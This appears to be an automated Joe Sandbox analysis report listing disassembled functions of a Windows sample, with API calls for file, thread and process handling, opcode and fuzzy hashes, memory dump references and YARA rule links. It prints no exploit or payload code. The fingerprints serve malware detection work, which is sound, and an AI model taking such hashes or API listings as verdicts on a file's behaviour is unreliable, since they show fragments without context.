Opcode ID: ac8e0d61ad9562805f3f0f4ceccdbb6567ef63bb883097c4bc40aa5993711c11
Instruction ID: 616b32db13ed189138f7f8fcc4c251e78e63d61fc170d5ba530e47bc90466a0f
Opcode Fuzzy Hash: ac8e0d61ad9562805f3f0f4ceccdbb6567ef63bb883097c4bc40aa5993711c11
Instruction Fuzzy Hash: 37315C11E0C12266FB56BB2494123B9D391AF49384FE45C34EA0E4B2E7CEADE854E371

Function 00007FF731C83644 Relevance: 6.1, APIs: 4, Instructions: 94COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,00000000,?,00007FF731C8305D), ref: 00007FF731C8368E
CreateDirectoryW.KERNEL32 ref: 00007FF731C836F3
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,00007FF731C8305D), ref: 00007FF731C83751
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C8378E

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2359106489-0
Opcode ID: 16235a4791ee42a9e70d459a53685e17624415c9c9910e7c0b15a22c5901c021
Instruction ID: b33fd13b313f22230bf7449826f26342b3bfbe4cab2b7063826dae7cfb0ca39c
Opcode Fuzzy Hash: 16235a4791ee42a9e70d459a53685e17624415c9c9910e7c0b15a22c5901c021
Instruction Fuzzy Hash: 0231E822E0C78261EB20BB29A584279E351FF887D0FE46231EE9D47AC5DFBCD441D620

Function 00007FF731C822E0 Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(?,?,?,?,00000000,00007FF731C828E7,?,00100000,?,00000001,00000000,00000000,?,00007FF731C81479), ref: 00007FF731C82308
ReadFile.KERNELBASE ref: 00007FF731C82327
GetLastError.KERNEL32 ref: 00007FF731C8235B
GetLastError.KERNEL32 ref: 00007FF731C8237A

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: d9ea8162334859a899980f74fa79e6bbf85c98ea8a13f51b84765ec106e6a7b0
Instruction ID: 4b1b9915f3811a164fd773f33e79c36e386fa2cab938314484a06d2af56da249
Opcode Fuzzy Hash: d9ea8162334859a899980f74fa79e6bbf85c98ea8a13f51b84765ec106e6a7b0
Instruction Fuzzy Hash: 8521A721E0CA1291EB20AB21E45833DE398FB49F94FB44131DA5D47A84CFBCE845E760

Function 00007FF731C8E8C4 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF731C8EC58: ResetEvent.KERNEL32 ref: 00007FF731C8EC71
Part of subcall function 00007FF731C8EC58: ReleaseSemaphore.KERNEL32 ref: 00007FF731C8EC87

ReleaseSemaphore.KERNEL32 ref: 00007FF731C8E8F0
CloseHandle.KERNELBASE ref: 00007FF731C8E90F
DeleteCriticalSection.KERNEL32 ref: 00007FF731C8E926
CloseHandle.KERNEL32 ref: 00007FF731C8E933

Part of subcall function 00007FF731C8E9D8: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF731C8E8DB,?,?,?,00007FF731C845FA,?,?,?), ref: 00007FF731C8E9DF
Part of subcall function 00007FF731C8E9D8: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF731C8E8DB,?,?,?,00007FF731C845FA,?,?,?), ref: 00007FF731C8E9EA

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: CloseHandleReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 502429940-0
Opcode ID: 2e544ca9f261f0376ccf83801800674c3d7e3c4b44cdcb23e888c53b8c5725df
Instruction ID: 657398f6bb3873f966fdeb7ec1e1f960f2f8ee42947e7808370ff2fec97c5757
Opcode Fuzzy Hash: 2e544ca9f261f0376ccf83801800674c3d7e3c4b44cdcb23e888c53b8c5725df
Instruction Fuzzy Hash: 85014032E19A91A2E748EB21E5842ADA331FB88BC0F904031DB5E43611CFB9E4B4D750

Function 00007FF731C8EA20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE ref: 00007FF731C8EA5C
SetThreadPriority.KERNEL32 ref: 00007FF731C8EAB2

Strings

CreateThread failed, xrefs: 00007FF731C8EA6A

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: Thread$CreatePriority
String ID: CreateThread failed
API String ID: 2610526550-3849766595
Opcode ID: 485e209270f66b590ec8176dafed7bfb240ecdea8f700010846f48018d17601d
Instruction ID: 0840ba981f47e4db877996228c81cc0ea72baaf913569724dc7f3febef685c34
Opcode Fuzzy Hash: 485e209270f66b590ec8176dafed7bfb240ecdea8f700010846f48018d17601d
Instruction Fuzzy Hash: 0E115432E09A42A1F704FB14E8812BDF360FB84B94FE48131D64D02665DFBCE596D760

Function 00007FF731C993EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26comCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF731C8DF4C: GetSystemDirectoryW.KERNEL32 ref: 00007FF731C8DD5B

OleInitialize.OLE32 ref: 00007FF731C99406
SHGetMalloc.SHELL32 ref: 00007FF731C99454

Strings

riched20.dll, xrefs: 00007FF731C993F5

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: DirectoryInitializeMallocSystem
String ID: riched20.dll
API String ID: 174490985-3360196438
Opcode ID: c34aace14b4968e7e8138c84649bdfd409ced11a060b8a8d8367bbc56b2e4ded
Instruction ID: f1f9b0f65d4c3ec864600448e9ec7fd36f2e513dea47926291a5f3beb71b2fec
Opcode Fuzzy Hash: c34aace14b4968e7e8138c84649bdfd409ced11a060b8a8d8367bbc56b2e4ded
Instruction Fuzzy Hash: D8F04F72A18A4192EB00AF60F8541AAF7A0FB88754F944135E68E42B54DFBCE558DB10

Function 00007FF731C908DC Relevance: 4.7, APIs: 3, Instructions: 152windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF731C984BC: GlobalMemoryStatusEx.KERNEL32 ref: 00007FF731C984EC

Part of subcall function 00007FF731C71FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C71FFB

Part of subcall function 00007FF731C7129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF731C71396

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731CA013B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731CA0141
SendDlgItemMessageW.USER32 ref: 00007FF731CA0172

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskGlobalItemMemoryMessageSendStatus
String ID:
API String ID: 3842196933-0
Opcode ID: 3b8d238b842e59327892d7a9c381640647aeb18a20af9d6b9c58c04cd74eeba4
Instruction ID: 4a191fa15a3145d2c86427536cd3bad6f63283c9172b799e5f38d97c0498853c
Opcode Fuzzy Hash: 3b8d238b842e59327892d7a9c381640647aeb18a20af9d6b9c58c04cd74eeba4
Instruction Fuzzy Hash: 1E51C362F146426AFB10BBB5D4452FCA362AB85BC4FA00536DE0D57BD6EEACE500D360

Function 00007FF731C71744 Relevance: 4.6, APIs: 3, Instructions: 118COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C7189C
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF731C718A8
__std_exception_copy.LIBVCRUNTIME ref: 00007FF731C718D4

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: Concurrency::cancel_current_task__std_exception_copy_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2371198981-0
Opcode ID: 2fcc375b70c6e36feabcfa94de8a7a9fce7d35ca2701883c5898f2074684aa35
Instruction ID: d786905b10ef5e86af8220d79a840058689d755793a46e0a46f9deef40a52ba6
Opcode Fuzzy Hash: 2fcc375b70c6e36feabcfa94de8a7a9fce7d35ca2701883c5898f2074684aa35
Instruction Fuzzy Hash: 41413161F18646A9EB04EB22E544279E365EB04BE0FA48631DE6C07BD5EFFCE091D314

Function 00007FF731C820F4 Relevance: 4.6, APIs: 3, Instructions: 114fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE ref: 00007FF731C8218F
CreateFileW.KERNEL32 ref: 00007FF731C821FC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C82298

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: CreateFile$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2272807158-0
Opcode ID: fb5c64d1f8032ebf61ecf4449d8b2102e11d21436edbdafeba6705f33b7752f9
Instruction ID: 7776b50c1384532d5a4b6a693746551e088d8a4220490b3b97cf6a7b3c5a82a6
Opcode Fuzzy Hash: fb5c64d1f8032ebf61ecf4449d8b2102e11d21436edbdafeba6705f33b7752f9
Instruction Fuzzy Hash: 0D41D673E0878192EB109B15E488669A361FB48BB4FA05734DFAD07AD5CFBCE890D710

Function 00007FF731C723F8 Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32 ref: 00007FF731C7243E
GetWindowTextW.USER32 ref: 00007FF731C72476
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C72505

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2176759853-0
Opcode ID: fa376e6cf3c94224980e1d9c943e6820de754cda6ff50216ef5d929fb6ca330a
Instruction ID: 38e33b8beba843172a0f843aad4e15e20fac21952b7e7b1023c7d240a1ef23bf
Opcode Fuzzy Hash: fa376e6cf3c94224980e1d9c943e6820de754cda6ff50216ef5d929fb6ca330a
Instruction Fuzzy Hash: 4B21C073E28B8191EB10AB65A84016AA360FB89BD0FA44235EB8D03B95CFBCD191C740

Function 00007FF731C91F14 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF731C91FDB
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF731C91FF7
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF731C92013

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: std::bad_alloc::bad_alloc
String ID:
API String ID: 1875163511-0
Opcode ID: 3747592df6810f3b80908203676324b628f5a531b91ae398ec61740efd87838a
Instruction ID: 9a24544731e2d85f38baf7e026df9c303e2bc7af48600328add7dc905a1f4c90
Opcode Fuzzy Hash: 3747592df6810f3b80908203676324b628f5a531b91ae398ec61740efd87838a
Instruction Fuzzy Hash: 4C318422E08A8AB1FB25B714E4453BDE3A0FB50794FE40432D68C066A5EFFCE946D311

Function 00007FF731C83CF4 Relevance: 4.6, APIs: 3, Instructions: 62COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,00000000,00000001,?,00007FF731C90761), ref: 00007FF731C83D1E
SetFileAttributesW.KERNEL32 ref: 00007FF731C83D70
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C83DDA

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1203560049-0
Opcode ID: 21f673f0b1b21e1c806b71d7983ce794a7d8576a348defe7dddd008c7114c812
Instruction ID: 75e23a3fc2f1ef87f79494cb8aed395116fb4ebf052d5da3d7333690a287f19d
Opcode Fuzzy Hash: 21f673f0b1b21e1c806b71d7983ce794a7d8576a348defe7dddd008c7114c812
Instruction Fuzzy Hash: 87210D22F18782A1EF20AF25E48426DA361FF88BD4FA06231EA9D43AD4DF7CD541D710

Function 00007FF731C8317C Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000000,00007FF731C907A2), ref: 00007FF731C831A7
DeleteFileW.KERNEL32 ref: 00007FF731C831F7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C83261

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3118131910-0
Opcode ID: 0f937c2f2206f17e136aa9ca44b849dff8f95196abcbcd754bafe0a2f8f578b6
Instruction ID: eba1fd44f6e7b7c175ea47757ba10281a708c88e7a74d11fe0da1a08579fa501
Opcode Fuzzy Hash: 0f937c2f2206f17e136aa9ca44b849dff8f95196abcbcd754bafe0a2f8f578b6
Instruction Fuzzy Hash: B921B622E1878291EB10EB25F48426EA360FB88BD4FA06230EA9D46A95DF7CD541DB50

Function 00007FF731C8327C Relevance: 4.6, APIs: 3, Instructions: 57COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,?,00007FF731C8E52D,?,?,?,00000000,?), ref: 00007FF731C832A7
GetFileAttributesW.KERNELBASE ref: 00007FF731C832F4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C83359

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1203560049-0
Opcode ID: 40705733cb67a71df3fff18e5a759fe286a379e9125aaba215c8f3cf6f78a58b
Instruction ID: 3652dc093a4cf8c1221cf3192aed579c412c4064aa9f5b5a533f4e1b81a8ec1d
Opcode Fuzzy Hash: 40705733cb67a71df3fff18e5a759fe286a379e9125aaba215c8f3cf6f78a58b
Instruction Fuzzy Hash: 64217422E1878192EB10AB29F484269A361FBC8BA4FA05231EA9D47BD5DF7CD541DB10

Function 00007FF731CABEE4 Relevance: 4.5, APIs: 3, Instructions: 19COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF731CABEC8), ref: 00007FF731CABF0C
TerminateProcess.KERNEL32(?,?,?,00007FF731CABEC8), ref: 00007FF731CABF17
ExitProcess.KERNEL32 ref: 00007FF731CABF26

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 8918d945bc68b986d9b4f63ac5cfb24cb8c1f3a7e8295ea6f783a439b1dda531
Instruction ID: 0e1cc8c84fa8c27d44d17160c0e1cb8c7c2d2cbcad7aa987a3ea707afb6c6059
Opcode Fuzzy Hash: 8918d945bc68b986d9b4f63ac5cfb24cb8c1f3a7e8295ea6f783a439b1dda531
Instruction Fuzzy Hash: C2E04F28F1530552FB44BB71AC9137D6366AF88B41FA48838C80E43396CEBEA4099B20

Function 00007FF731C7F588 Relevance: 3.2, APIs: 2, Instructions: 193COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C7F8A5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C7F8AB

Part of subcall function 00007FF731C83E88: FindClose.KERNELBASE(?,?,00000000,00007FF731C90791), ref: 00007FF731C83EBD

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CloseFind
String ID:
API String ID: 3587649625-0
Opcode ID: 16a68227de60e06bbac92a1992007f9f6dbd4a0c9fd84afcacd01604ba74844e
Instruction ID: d397da1544bb36954292ac9841122c50a68303a084143af796441cd9e1b03b6e
Opcode Fuzzy Hash: 16a68227de60e06bbac92a1992007f9f6dbd4a0c9fd84afcacd01604ba74844e
Instruction Fuzzy Hash: 66919033E18791A8FB10EF64D4842ADA361FB85798FA04135EA6C07AE9DFF8D545D320

Function 00007FF731C73904 Relevance: 3.1, APIs: 2, Instructions: 124COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C73AB3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C73AB9

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
